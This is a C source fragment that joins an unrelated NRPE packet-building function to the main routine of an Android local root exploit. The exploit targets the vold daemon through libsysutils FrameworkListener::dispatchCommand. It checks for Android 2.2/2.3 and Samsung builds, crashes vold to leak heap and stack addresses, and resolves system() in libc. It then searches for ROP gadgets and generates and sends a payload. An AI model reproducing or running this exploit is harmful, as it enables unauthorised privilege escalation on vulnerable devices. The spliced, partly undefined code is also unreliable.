const char* create_buffer() {
delete [] tmpBuffer;
unsigned int packet_length = nrpe::length::get_packet_length(payload_length_);
tmpBuffer = new char[packet_length+1];
memset(tmpBuffer, 0, packet_length+1);
nrpe::data::packet *p = reinterpret_cast<nrpe::data::packet*>(tmpBuffer);
p->result_code = swap_bytes::hton<int16_t>(result_);
p->packet_type = swap_bytes::hton<int16_t>(type_);
p->packet_version = swap_bytes::hton<int16_t>(version_);
if (payload_.length() >= payload_length_)
throw nrpe::nrpe_exception("To much data cant create return packet (truncate data)");
update_payload(p, payload_);
p->crc32_value = 0;
crc32_ = p->crc32_value = swap_bytes::hton<u_int32_t>(calculate_crc32(tmpBuffer, packet_length));
return tmpBuffer;
}
int main(int argc, char **argv, char **env)
{
uint32_t i = 0, ok = 0;
struct stat st;
char version_release[1024];
int tries=0;
int payload_size=0;
stat(vold, &st);
heap_base_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000;
__system_property_get("ro.build.version.release", version_release);
if (strstr(version_release, "2.2")) {
heap_offset = 0x108;
printf("[+] Found a Froyo ! 0x%08x\n", heap_offset);
} else if (strstr(version_release, "2.3")) {
heap_offset = 0x118;
printf("[+] Found a GingerBread ! 0x%08x\n", heap_offset);
} else {
printf("[-] Not a 2.2/2.3 Android ...\n");
exit(-1);
}
heap_addr = 0xffffff;
__system_property_get("ro.build.fingerprint", version_release);
if(!strncmp(version_release, "samsung", 7)) {
printf("[+] Found a Samsung, running Samsung mode\n");
samsung = 1;
}
system_ptr = (uint32_t) find_symbol("system");
libc_base = system_ptr & 0xfff00000;
if (check_addr(system_ptr) == -1) {
printf("[-] system_ptr contains forbidden bytes!\n");
exit(-1);
}
tries = 0;
printf("[*] Step 1: causing the first vold crash...\n");
while(buffsz=allbuffsz[tries]) {
if(checkcrash()) {
printf("[+] Vold crashed using %d arguments!\n", buffsz);
break;
}
tries++;
}
if(!buffsz) {
printf("[-] Unable to crash vold process. Fixed vold???\n");
exit(-1);
}
for (tries = 0; tries < 2; tries++) {
heap_oracle();
printf("\n[*] Step 2: causing the second vold crash\n");
find_stack_addr();
if (stack_addr != 0x41414141 && jumpsz) {
printf("[+] stack_addr found: 0x%08x, padding: 0x%04x\n", stack_addr, jumpsz);
break;
}
}
if (stack_addr == 0x41414141 || !jumpsz) {
printf("[-] Unable to generate stack_addr!\n\n");
exit(-1);
}
if (check_addr(stack_addr) == -1) {
if(bad_byte(stack_addr & 0xff)) {
stack_addr += 4;
adjust = 4;
if (check_addr(stack_addr) == -1) {
printf("[-] stack_addr contains forbidden bytes!\n");
exit(-1);
}
}
else {
printf("[-] stack_addr contains forbidden bytes!\n");
exit(-1);
}
}
if (jumpsz > 108 + 12) {
printf("[-] Too much padding is needed!\n");
exit(-1);
}
if(check_libc_base()) {
system_ptr = libc_base + (system_ptr & 0x000fffff);
printf("[*] Pointer to system function found at 0x%08x ...\n", system_ptr);
if (check_addr(system_ptr) == -1) {
printf("[-] Pointer to system function contains forbidden bytes!\n");
exit(-1);
}
}
kill(logcat_pid, SIGKILL);
unlink(crashlog);
printf("\n[*] Researching ROP gadgets ...\n");
find_rop_gadgets();
printf("[+] first gadget found at 0x%08x, second gadget found at 0x%08x\n", stack_pivot, pop_r0);
payload_size = update_payload();
printf("\n[*] Payload generated: %d bytes\n", payload_size);
print_payload(payload_size);
return 0;
}
// Exploit libsysutils FrameworkListener::dispatchCommand method
int do_fault()
{
return send_payload(update_payload());
}
